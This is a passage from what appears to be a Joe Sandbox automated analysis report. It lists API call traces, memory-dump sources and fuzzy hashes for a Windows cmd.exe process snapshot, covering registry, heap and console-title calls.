                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,00000000,00000000,00000002), ref: 00D7CB58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
                                                                                        • String ID: REM/?
                                                                                        • API String ID: 49548326-4093888634
                                                                                        • Opcode ID: 32e42d85ed8aa8792b1968f516938045a5b60142a3d9b2d4381660d7a7c3a353
                                                                                        • Instruction ID: ec928ead87cc7a46f4b0ec22b06eb7747952f3f02ad60488ff53c50d3d34deca
                                                                                        • Opcode Fuzzy Hash: 32e42d85ed8aa8792b1968f516938045a5b60142a3d9b2d4381660d7a7c3a353
                                                                                        • Instruction Fuzzy Hash: EC31D3327203059BD724EB79A852B3A73A6EF81714F15682FE146DB291EAF1CC008776
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00D8CD40,0000001C,00D86901), ref: 00D856A8
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00D85778
                                                                                          • Part of subcall function 00D864DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D8650F
                                                                                          • Part of subcall function 00D864DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00), ref: 00D86545
                                                                                          • Part of subcall function 00D864DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D86553
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                                        • String ID: Software\Classes
                                                                                        • API String ID: 1047774138-1656466771
                                                                                        • Opcode ID: ae4d8fa918aaf679cddcd13adc426e1006a80248bec5d93e1799a924efa1c84f
                                                                                        • Instruction ID: 46570857120bfae726a41ebf9d0c907b60ee03d4447c60db3eae1fe97ddb1dc4
                                                                                        • Opcode Fuzzy Hash: ae4d8fa918aaf679cddcd13adc426e1006a80248bec5d93e1799a924efa1c84f
                                                                                        • Instruction Fuzzy Hash: 5F315075E04714CFDB08BBB8E852AAD77B2EF88710F24802EE006B7295EA755C008B74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00D8CCE0,0000001C,00D86931), ref: 00D85E32
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00D85EFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$CloseOpeniswspace
                                                                                        • String ID: Software\Classes
                                                                                        • API String ID: 2439148603-1656466771
                                                                                        • Opcode ID: bce119d169e71c73ba32690f92f34964c12b7a2b94efb471533e1c76d6cc5c3b
                                                                                        • Instruction ID: 53ea460ff304c39eea5ca65c6ece908a4e1a1d98d46c3036f1c4b75e0b8f5751
                                                                                        • Opcode Fuzzy Hash: bce119d169e71c73ba32690f92f34964c12b7a2b94efb471533e1c76d6cc5c3b
                                                                                        • Instruction Fuzzy Hash: 45315071E147148FDB09BFA8E852AAD76B1EF48710F24812EF406B7295EA715D008B74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,00D6B11F), ref: 00D7CB8B
                                                                                        • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 00D7CC2D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleTitle
                                                                                        • String ID: -
                                                                                        • API String ID: 3358957663-3695764949
                                                                                        • Opcode ID: feaf1b3a48131fabb418235d3dd8c894218651934adb611fce2162862cad16fe
                                                                                        • Instruction ID: 97a8b1cb3b8f4bac9bac2932be668f85f5d2ed3471bd9fe8ea17e5e4515368ba
                                                                                        • Opcode Fuzzy Hash: feaf1b3a48131fabb418235d3dd8c894218651934adb611fce2162862cad16fe
                                                                                        • Instruction Fuzzy Hash: 582178317002058BCB19ABACD89577E77A2EBC0300F1D802EE8069B744FA74DD46CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 00D7DC57
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                        • API String ID: 2221118986-3416068913
                                                                                        • Opcode ID: 042365f0ab84c3ff389d70697730920368160b31538d1d5b2ad546a624877026
                                                                                        • Instruction ID: 8b91bee1d06f93e88ad581a93213e3dfcc2b782b171014732a168a3ff3b422c5
                                                                                        • Opcode Fuzzy Hash: 042365f0ab84c3ff389d70697730920368160b31538d1d5b2ad546a624877026
                                                                                        • Instruction Fuzzy Hash: 23012475740704ABD7289A389C0AB67B7DACF80310F18852EF85AC7341EEA6FC0082B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: iswspacewcschr
                                                                                        • String ID: =,;
                                                                                        • API String ID: 287713880-1539845467
                                                                                        • Opcode ID: 78b361f6da7a62c938f9f43fe8f460eb9f42fff768c7d99e827e3b52436a747d
                                                                                        • Instruction ID: 7ec976b2430da26c90b42b90caf8e1937ccdfff5a23d703137e973c9ed2a7e5f
                                                                                        • Opcode Fuzzy Hash: 78b361f6da7a62c938f9f43fe8f460eb9f42fff768c7d99e827e3b52436a747d
                                                                                        • Instruction Fuzzy Hash: A5E04F336046229B4A35065DBC18877A29BDFA7B6131E051BF9C4F2254EB618C4089B3
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%